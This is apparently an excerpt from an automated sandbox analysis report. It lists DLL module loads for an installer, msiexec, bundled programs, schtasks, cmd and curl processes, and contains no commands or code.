    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: iphlpapi.dllJump to behavior
    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: userenv.dllJump to behavior
    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: samcli.dllJump to behavior
    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: logoncli.dllJump to behavior
    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: netutils.dllJump to behavior
    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: msasn1.dllJump to behavior
    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: netapi32.dllJump to behavior
    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: iphlpapi.dllJump to behavior
    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: userenv.dllJump to behavior
    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: samcli.dllJump to behavior
    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: logoncli.dllJump to behavior
    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: netutils.dllJump to behavior
    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: msasn1.dllJump to behavior
    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: netapi32.dllJump to behavior
    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: iphlpapi.dllJump to behavior
    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: userenv.dllJump to behavior
    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: samcli.dllJump to behavior
    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: logoncli.dllJump to behavior
    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: netutils.dllJump to behavior
    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: msasn1.dllJump to behavior
    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: netapi32.dllJump to behavior
    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: iphlpapi.dllJump to behavior
    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: userenv.dllJump to behavior
    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: samcli.dllJump to behavior
    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: logoncli.dllJump to behavior
    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: netutils.dllJump to behavior
    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: msasn1.dllJump to behavior
    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: netapi32.dllJump to behavior
    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: iphlpapi.dllJump to behavior
    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: userenv.dllJump to behavior
    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: samcli.dllJump to behavior
    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: logoncli.dllJump to behavior
    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: netutils.dllJump to behavior
    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: windows.storage.dllJump to behavior
    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: wldp.dllJump to behavior
    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: msasn1.dllJump to behavior
    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: netapi32.dllJump to behavior
    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: version.dllJump to behavior
    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: secur32.dllJump to behavior
    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: samcli.dllJump to behavior
    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: netutils.dllJump to behavior
    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: sspicli.dllJump to behavior
    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: netapi32.dllJump to behavior
    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: iphlpapi.dllJump to behavior
    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: userenv.dllJump to behavior
    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: samcli.dllJump to behavior
    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: logoncli.dllJump to behavior
    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: netutils.dllJump to behavior
    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: msasn1.dllJump to behavior
    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: netapi32.dllJump to behavior
    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: iphlpapi.dllJump to behavior
    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: userenv.dllJump to behavior
    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: samcli.dllJump to behavior
    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: logoncli.dllJump to behavior
    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: netutils.dllJump to behavior
    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: msasn1.dllJump to behavior
    Source: C:\Users\user\Desktop\setup.exeSection loaded: apphelp.dllJump to behavior
    Source: C:\Users\user\Desktop\setup.exeSection loaded: acgenral.dllJump to behavior
    Source: C:\Users\user\Desktop\setup.exeSection loaded: uxtheme.dllJump to behavior
    Source: C:\Users\user\Desktop\setup.exeSection loaded: winmm.dllJump to behavior
    Source: C:\Users\user\Desktop\setup.exeSection loaded: samcli.dllJump to behavior
    Source: C:\Users\user\Desktop\setup.exeSection loaded: msacm32.dllJump to behavior
    Source: C:\Users\user\Desktop\setup.exeSection loaded: version.dllJump to behavior
    Source: C:\Users\user\Desktop\setup.exeSection loaded: userenv.dllJump to behavior
    Source: C:\Users\user\Desktop\setup.exeSection loaded: dwmapi.dllJump to behavior
    Source: C:\Users\user\Desktop\setup.exeSection loaded: urlmon.dllJump to behavior
    Source: C:\Users\user\Desktop\setup.exeSection loaded: mpr.dllJump to behavior
    Source: C:\Users\user\Desktop\setup.exeSection loaded: sspicli.dllJump to behavior
    Source: C:\Users\user\Desktop\setup.exeSection loaded: winmmbase.dllJump to behavior
    Source: C:\Users\user\Desktop\setup.exeSection loaded: winmmbase.dllJump to behavior
    Source: C:\Users\user\Desktop\setup.exeSection loaded: iertutil.dllJump to behavior
    Source: C:\Users\user\Desktop\setup.exeSection loaded: srvcli.dllJump to behavior
    Source: C:\Users\user\Desktop\setup.exeSection loaded: netutils.dllJump to behavior
    Source: C:\Users\user\Desktop\setup.exeSection loaded: windowscodecs.dllJump to behavior
    Source: C:\Users\user\Desktop\setup.exeSection loaded: msi.dllJump to behavior
    Source: C:\Users\user\Desktop\setup.exeSection loaded: usp10.dllJump to behavior
    Source: C:\Users\user\Desktop\setup.exeSection loaded: msls31.dllJump to behavior
    Source: C:\Users\user\Desktop\setup.exeSection loaded: profapi.dllJump to behavior
    Source: C:\Users\user\Desktop\setup.exeSection loaded: davhlpr.dllJump to behavior
    Source: C:\Users\user\Desktop\setup.exeSection loaded: msimg32.dllJump to behavior
    Source: C:\Users\user\Desktop\setup.exeSection loaded: dbghelp.dllJump to behavior
    Source: C:\Users\user\Desktop\setup.exeSection loaded: wininet.dllJump to behavior
    Source: C:\Users\user\Desktop\setup.exeSection loaded: cabinet.dllJump to behavior
    Source: C:\Users\user\Desktop\setup.exeSection loaded: propsys.dllJump to behavior
    Source: C:\Users\user\Desktop\setup.exeSection loaded: rsaenh.dllJump to behavior
    Source: C:\Users\user\Desktop\setup.exeSection loaded: msasn1.dllJump to behavior
    Source: C:\Users\user\Desktop\setup.exeSection loaded: lpk.dllJump to behavior
    Source: C:\Users\user\Desktop\setup.exeSection loaded: msihnd.dllJump to behavior
    Source: C:\Users\user\Desktop\setup.exeSection loaded: cryptsp.dllJump to behavior
    Source: C:\Users\user\Desktop\setup.exeSection loaded: secur32.dllJump to behavior
    Source: C:\Users\user\Desktop\setup.exeSection loaded: netapi32.dllJump to behavior
    Source: C:\Users\user\Desktop\setup.exeSection loaded: wkscli.dllJump to behavior
    Source: C:\Users\user\Desktop\setup.exeSection loaded: kernel.appcore.dllJump to behavior
    Source: C:\Users\user\Desktop\setup.exeSection loaded: riched20.dllJump to behavior
    Source: C:\Users\user\Desktop\setup.exeSection loaded: windows.storage.dllJump to behavior
    Source: C:\Users\user\Desktop\setup.exeSection loaded: wldp.dllJump to behavior
    Source: C:\Users\user\Desktop\setup.exeSection loaded: tsappcmp.dllJump to behavior
    Source: C:\Users\user\Desktop\setup.exeSection loaded: cryptbase.dllJump to behavior
    Source: C:\Users\user\Desktop\setup.exeSection loaded: msisip.dllJump to behavior
    Source: C:\Users\user\Desktop\setup.exeSection loaded: gpapi.dllJump to behavior
    Source: C:\Users\user\Desktop\setup.exeSection loaded: mscoree.dllJump to behavior
    Source: C:\Users\user\Desktop\setup.exeSection loaded: pcacli.dllJump to behavior
    Source: C:\Users\user\Desktop\setup.exeSection loaded: ntmarta.dllJump to behavior
    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: apphelp.dllJump to behavior
    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: aclayers.dllJump to behavior
    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: mpr.dllJump to behavior
    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: sfc.dllJump to behavior
    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: sfc_os.dllJump to behavior
    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: kernel.appcore.dllJump to behavior
    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: msi.dllJump to behavior
    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: netapi32.dllJump to behavior
    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: iphlpapi.dllJump to behavior
    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: userenv.dllJump to behavior
    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: samcli.dllJump to behavior
    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: logoncli.dllJump to behavior
    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: netutils.dllJump to behavior
    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: uxtheme.dllJump to behavior
    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: windows.storage.dllJump to behavior
    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: wldp.dllJump to behavior
    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: profapi.dllJump to behavior
    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: msasn1.dllJump to behavior
    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: netapi32.dllJump to behavior
    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: iphlpapi.dllJump to behavior
    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: userenv.dllJump to behavior
    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: samcli.dllJump to behavior
    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: logoncli.dllJump to behavior
    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: netutils.dllJump to behavior
    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: msasn1.dllJump to behavior
    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: netapi32.dllJump to behavior
    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: iphlpapi.dllJump to behavior
    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: userenv.dllJump to behavior
    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: samcli.dllJump to behavior
    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: logoncli.dllJump to behavior
    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: netutils.dllJump to behavior
    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: windows.ui.dllJump to behavior
    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: windowmanagementapi.dllJump to behavior
    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: textinputframework.dllJump to behavior
    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: inputhost.dllJump to behavior
    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: wintypes.dllJump to behavior
    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: twinapi.appcore.dllJump to behavior
    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: coreuicomponents.dllJump to behavior
    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: coremessaging.dllJump to behavior
    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: twinapi.appcore.dllJump to behavior
    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: coremessaging.dllJump to behavior
    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: propsys.dllJump to behavior
    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: coreuicomponents.dllJump to behavior
    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: coremessaging.dllJump to behavior
    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: ntmarta.dllJump to behavior
    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: coremessaging.dllJump to behavior
    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: windows.ui.immersive.dllJump to behavior
    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: msasn1.dllJump to behavior
    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: version.dllJump to behavior
    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: netapi32.dllJump to behavior
    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: netutils.dllJump to behavior
    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: samcli.dllJump to behavior
    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: wininet.dllJump to behavior
    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: iertutil.dllJump to behavior
    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: apphelp.dllJump to behavior
    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: aclayers.dllJump to behavior
    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: mpr.dllJump to behavior
    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: sfc.dllJump to behavior
    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: sfc_os.dllJump to behavior
    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: kernel.appcore.dllJump to behavior
    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: msi.dllJump to behavior
    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: wininet.dllJump to behavior
    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: iertutil.dllJump to behavior
    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: sspicli.dllJump to behavior
    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: windows.storage.dllJump to behavior
    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: wldp.dllJump to behavior
    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: profapi.dllJump to behavior
    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: winhttp.dllJump to behavior
    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: mswsock.dllJump to behavior
    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: iphlpapi.dllJump to behavior
    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: winnsi.dllJump to behavior
    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: urlmon.dllJump to behavior
    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: srvcli.dllJump to behavior
    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: netutils.dllJump to behavior
    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: dnsapi.dllJump to behavior
    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: rasadhlp.dllJump to behavior
    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: fwpuclnt.dllJump to behavior
    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: schannel.dllJump to behavior
    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: mskeyprotect.dllJump to behavior
    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: ntasn1.dllJump to behavior
    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: msasn1.dllJump to behavior
    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: dpapi.dllJump to behavior
    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: cryptsp.dllJump to behavior
    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: rsaenh.dllJump to behavior
    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: cryptbase.dllJump to behavior
    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: gpapi.dllJump to behavior
    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: ncrypt.dllJump to behavior
    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: ncryptsslp.dllJump to behavior
    Source: C:\Program Files (x86)\Main\MainSoftware.exeSection loaded: apphelp.dllJump to behavior
    Source: C:\Program Files (x86)\Main\MainSoftware.exeSection loaded: kernel.appcore.dllJump to behavior
    Source: C:\Program Files (x86)\Main\MainSoftware.exeSection loaded: icu.dllJump to behavior
    Source: C:\Program Files (x86)\Main\MainSoftware.exeSection loaded: secur32.dllJump to behavior
    Source: C:\Program Files (x86)\Main\MainSoftware.exeSection loaded: sspicli.dllJump to behavior
    Source: C:\Program Files (x86)\Main\MainSoftware.exeSection loaded: iphlpapi.dllJump to behavior
    Source: C:\Program Files (x86)\Main\MainSoftware.exeSection loaded: dnsapi.dllJump to behavior
    Source: C:\Program Files (x86)\Main\MainSoftware.exeSection loaded: dhcpcsvc6.dllJump to behavior
    Source: C:\Program Files (x86)\Main\MainSoftware.exeSection loaded: dhcpcsvc.dllJump to behavior
    Source: C:\Program Files (x86)\Main\MainSoftware.exeSection loaded: winnsi.dllJump to behavior
    Source: C:\Program Files (x86)\Main\MainSoftware.exeSection loaded: winhttp.dllJump to behavior
    Source: C:\Program Files (x86)\Main\MainSoftware.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
    Source: C:\Program Files (x86)\Main\MainSoftware.exeSection loaded: mswsock.dllJump to behavior
    Source: C:\Program Files (x86)\Main\MainSoftware.exeSection loaded: wshunix.dllJump to behavior
    Source: C:\Program Files (x86)\Main\MainSoftware.exeSection loaded: winrnr.dllJump to behavior
    Source: C:\Program Files (x86)\Main\MainSoftware.exeSection loaded: rasadhlp.dllJump to behavior
    Source: C:\Program Files (x86)\Main\MainSoftware.exeSection loaded: nlaapi.dllJump to behavior
    Source: C:\Program Files (x86)\Main\MainSoftware.exeSection loaded: wshbth.dllJump to behavior
    Source: C:\Program Files (x86)\Main\MainSoftware.exeSection loaded: devobj.dllJump to behavior
    Source: C:\Program Files (x86)\Main\MainSoftware.exeSection loaded: napinsp.dllJump to behavior
    Source: C:\Program Files (x86)\Main\MainSoftware.exeSection loaded: pnrpnsp.dllJump to behavior
    Source: C:\Program Files (x86)\Main\MainSoftware.exeSection loaded: fwpuclnt.dllJump to behavior
    Source: C:\Program Files (x86)\Main\MainSoftware.exeSection loaded: schannel.dllJump to behavior
    Source: C:\Program Files (x86)\Main\MainSoftware.exeSection loaded: mskeyprotect.dllJump to behavior
    Source: C:\Program Files (x86)\Main\MainSoftware.exeSection loaded: ntasn1.dllJump to behavior
    Source: C:\Program Files (x86)\Main\MainSoftware.exeSection loaded: ncrypt.dllJump to behavior
    Source: C:\Program Files (x86)\Main\MainSoftware.exeSection loaded: ncryptsslp.dllJump to behavior
    Source: C:\Program Files (x86)\Main\MainSoftware.exeSection loaded: msasn1.dllJump to behavior
    Source: C:\Program Files (x86)\Main\MainSoftware.exeSection loaded: cryptsp.dllJump to behavior
    Source: C:\Program Files (x86)\Main\MainSoftware.exeSection loaded: rsaenh.dllJump to behavior
    Source: C:\Program Files (x86)\Main\MainSoftware.exeSection loaded: cryptbase.dllJump to behavior
    Source: C:\Program Files (x86)\Main\MainSoftware.exeSection loaded: gpapi.dllJump to behavior
    Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dll
    Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dll
    Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dll
    Source: C:\Windows\System32\schtasks.exeSection loaded: xmllite.dll
    Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dll
    Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dll
    Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dll
    Source: C:\Program Files (x86)\Main\MainSoftware.exeSection loaded: kernel.appcore.dll
    Source: C:\Program Files (x86)\Main\MainSoftware.exeSection loaded: icu.dll
    Source: C:\Program Files (x86)\Main\MainSoftware.exeSection loaded: iphlpapi.dll
    Source: C:\Program Files (x86)\Main\MainSoftware.exeSection loaded: dnsapi.dll
    Source: C:\Program Files (x86)\Main\MainSoftware.exeSection loaded: dhcpcsvc6.dll
    Source: C:\Program Files (x86)\Main\MainSoftware.exeSection loaded: dhcpcsvc.dll
    Source: C:\Program Files (x86)\Main\MainSoftware.exeSection loaded: winnsi.dll
    Source: C:\Program Files (x86)\Main\MainSoftware.exeSection loaded: winhttp.dll
    Source: C:\Program Files (x86)\Main\MainSoftware.exeSection loaded: ondemandconnroutehelper.dll
    Source: C:\Program Files (x86)\Main\MainSoftware.exeSection loaded: mswsock.dll
    Source: C:\Program Files (x86)\Main\MainSoftware.exeSection loaded: wshunix.dll
    Source: C:\Program Files (x86)\Main\MainSoftware.exeSection loaded: winrnr.dll
    Source: C:\Program Files (x86)\Main\MainSoftware.exeSection loaded: rasadhlp.dll
    Source: C:\Program Files (x86)\Main\MainSoftware.exeSection loaded: nlaapi.dll
    Source: C:\Program Files (x86)\Main\MainSoftware.exeSection loaded: wshbth.dll
    Source: C:\Program Files (x86)\Main\MainSoftware.exeSection loaded: devobj.dll
    Source: C:\Program Files (x86)\Main\MainSoftware.exeSection loaded: pnrpnsp.dll
    Source: C:\Program Files (x86)\Main\MainSoftware.exeSection loaded: napinsp.dll
    Source: C:\Program Files (x86)\Main\MainSoftware.exeSection loaded: fwpuclnt.dll
    Source: C:\Program Files (x86)\Main\MainSoftware.exeSection loaded: sspicli.dll
    Source: C:\Program Files (x86)\Main\MainSoftware.exeSection loaded: schannel.dll
    Source: C:\Program Files (x86)\Main\MainSoftware.exeSection loaded: mskeyprotect.dll
    Source: C:\Program Files (x86)\Main\MainSoftware.exeSection loaded: ntasn1.dll
    Source: C:\Program Files (x86)\Main\MainSoftware.exeSection loaded: ncrypt.dll
    Source: C:\Program Files (x86)\Main\MainSoftware.exeSection loaded: ncryptsslp.dll
    Source: C:\Program Files (x86)\Main\MainSoftware.exeSection loaded: msasn1.dll
    Source: C:\Program Files (x86)\Main\MainSoftware.exeSection loaded: cryptsp.dll
    Source: C:\Program Files (x86)\Main\MainSoftware.exeSection loaded: rsaenh.dll
    Source: C:\Program Files (x86)\Main\MainSoftware.exeSection loaded: cryptbase.dll
    Source: C:\Program Files (x86)\Main\MainSoftware.exeSection loaded: gpapi.dll
    Source: C:\Program Files (x86)\Main\MainSoftware.exeSection loaded: uxtheme.dll
    Source: C:\Program Files (x86)\Main\MainSoftware.exeSection loaded: windows.storage.dll
    Source: C:\Program Files (x86)\Main\MainSoftware.exeSection loaded: wldp.dll
    Source: C:\Program Files (x86)\Main\MainSoftware.exeSection loaded: propsys.dll
    Source: C:\Program Files (x86)\Main\MainSoftware.exeSection loaded: profapi.dll
    Source: C:\Program Files (x86)\Main\MainSoftware.exeSection loaded: edputil.dll
    Source: C:\Program Files (x86)\Main\MainSoftware.exeSection loaded: urlmon.dll
    Source: C:\Program Files (x86)\Main\MainSoftware.exeSection loaded: iertutil.dll
    Source: C:\Program Files (x86)\Main\MainSoftware.exeSection loaded: srvcli.dll
    Source: C:\Program Files (x86)\Main\MainSoftware.exeSection loaded: netutils.dll
    Source: C:\Program Files (x86)\Main\MainSoftware.exeSection loaded: windows.staterepositoryps.dll
    Source: C:\Program Files (x86)\Main\MainSoftware.exeSection loaded: wintypes.dll
    Source: C:\Program Files (x86)\Main\MainSoftware.exeSection loaded: appresolver.dll
    Source: C:\Program Files (x86)\Main\MainSoftware.exeSection loaded: bcp47langs.dll
    Source: C:\Program Files (x86)\Main\MainSoftware.exeSection loaded: slc.dll
    Source: C:\Program Files (x86)\Main\MainSoftware.exeSection loaded: userenv.dll
    Source: C:\Program Files (x86)\Main\MainSoftware.exeSection loaded: sppc.dll
    Source: C:\Program Files (x86)\Main\MainSoftware.exeSection loaded: onecorecommonproxystub.dll
    Source: C:\Program Files (x86)\Main\MainSoftware.exeSection loaded: onecoreuapcommonproxystub.dll
    Source: C:\Program Files (x86)\Main\MainSoftware.exeSection loaded: apphelp.dll
    Source: C:\Program Files (x86)\Atomix\Addons\SoftwareDistributor.exeSection loaded: apphelp.dll
    Source: C:\Program Files (x86)\Atomix\Addons\SoftwareDistributor.exeSection loaded: kernel.appcore.dll
    Source: C:\Program Files (x86)\Atomix\Addons\SoftwareDistributor.exeSection loaded: icu.dll
    Source: C:\Program Files (x86)\Atomix\Addons\SoftwareDistributor.exeSection loaded: windows.storage.dll
    Source: C:\Program Files (x86)\Atomix\Addons\SoftwareDistributor.exeSection loaded: wldp.dll
    Source: C:\Program Files (x86)\Atomix\Addons\SoftwareDistributor.exeSection loaded: iphlpapi.dll
    Source: C:\Program Files (x86)\Atomix\Addons\SoftwareDistributor.exeSection loaded: dnsapi.dll
    Source: C:\Program Files (x86)\Atomix\Addons\SoftwareDistributor.exeSection loaded: dhcpcsvc6.dll
    Source: C:\Program Files (x86)\Atomix\Addons\SoftwareDistributor.exeSection loaded: dhcpcsvc.dll
    Source: C:\Program Files (x86)\Atomix\Addons\SoftwareDistributor.exeSection loaded: winnsi.dll
    Source: C:\Program Files (x86)\Atomix\Addons\SoftwareDistributor.exeSection loaded: winhttp.dll
    Source: C:\Program Files (x86)\Atomix\Addons\SoftwareDistributor.exeSection loaded: ondemandconnroutehelper.dll
    Source: C:\Program Files (x86)\Atomix\Addons\SoftwareDistributor.exeSection loaded: mswsock.dll
    Source: C:\Program Files (x86)\Atomix\Addons\SoftwareDistributor.exeSection loaded: wshunix.dll
    Source: C:\Program Files (x86)\Atomix\Addons\SoftwareDistributor.exeSection loaded: winrnr.dll
    Source: C:\Program Files (x86)\Atomix\Addons\SoftwareDistributor.exeSection loaded: rasadhlp.dll
    Source: C:\Program Files (x86)\Atomix\Addons\SoftwareDistributor.exeSection loaded: nlaapi.dll
    Source: C:\Program Files (x86)\Atomix\Addons\SoftwareDistributor.exeSection loaded: wshbth.dll
    Source: C:\Program Files (x86)\Atomix\Addons\SoftwareDistributor.exeSection loaded: devobj.dll
    Source: C:\Program Files (x86)\Atomix\Addons\SoftwareDistributor.exeSection loaded: pnrpnsp.dll
    Source: C:\Program Files (x86)\Atomix\Addons\SoftwareDistributor.exeSection loaded: napinsp.dll
    Source: C:\Program Files (x86)\Atomix\Addons\SoftwareDistributor.exeSection loaded: fwpuclnt.dll
    Source: C:\Program Files (x86)\Atomix\Addons\SoftwareDistributor.exeSection loaded: sspicli.dll
    Source: C:\Program Files (x86)\Atomix\Addons\SoftwareDistributor.exeSection loaded: schannel.dll
    Source: C:\Program Files (x86)\Atomix\Addons\SoftwareDistributor.exeSection loaded: mskeyprotect.dll
    Source: C:\Program Files (x86)\Atomix\Addons\SoftwareDistributor.exeSection loaded: ntasn1.dll
    Source: C:\Program Files (x86)\Atomix\Addons\SoftwareDistributor.exeSection loaded: ncrypt.dll
    Source: C:\Program Files (x86)\Atomix\Addons\SoftwareDistributor.exeSection loaded: ncryptsslp.dll
    Source: C:\Program Files (x86)\Atomix\Addons\SoftwareDistributor.exeSection loaded: msasn1.dll
    Source: C:\Program Files (x86)\Atomix\Addons\SoftwareDistributor.exeSection loaded: cryptsp.dll
    Source: C:\Program Files (x86)\Atomix\Addons\SoftwareDistributor.exeSection loaded: rsaenh.dll
    Source: C:\Program Files (x86)\Atomix\Addons\SoftwareDistributor.exeSection loaded: cryptbase.dll
    Source: C:\Program Files (x86)\Atomix\Addons\SoftwareDistributor.exeSection loaded: gpapi.dll
    Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dll
    Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dll
    Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dll
    Source: C:\Windows\System32\schtasks.exeSection loaded: xmllite.dll
    Source: C:\Program Files (x86)\Main\Chop\Install.exeSection loaded: apphelp.dll
    Source: C:\Program Files (x86)\Main\Chop\Install.exeSection loaded: kernel.appcore.dll
    Source: C:\Windows\System32\cmd.exeSection loaded: apphelp.dll
    Source: C:\Windows\System32\curl.exeSection loaded: secur32.dll
    Source: C:\Windows\System32\curl.exeSection loaded: sspicli.dll
    Source: C:\Windows\System32\curl.exeSection loaded: iphlpapi.dll
    Source: C:\Windows\System32\curl.exeSection loaded: mswsock.dll
    Source: C:\Windows\System32\curl.exeSection loaded: kernel.appcore.dll
    Source: C:\Windows\System32\curl.exeSection loaded: dnsapi.dll
    Source: C:\Windows\System32\curl.exeSection loaded: rasadhlp.dll
    Source: C:\Windows\System32\curl.exeSection loaded: fwpuclnt.dll
    Source: C:\Windows\System32\curl.exeSection loaded: schannel.dll
    Source: C:\Windows\System32\curl.exeSection loaded: mskeyprotect.dll
    Source: C:\Windows\System32\curl.exeSection loaded: ntasn1.dll
    Source: C:\Windows\System32\curl.exeSection loaded: ncrypt.dll
    Source: C:\Windows\System32\curl.exeSection loaded: ncryptsslp.dll
    Source: C:\Program Files\Surfclub\Install.exeSection loaded: apphelp.dll
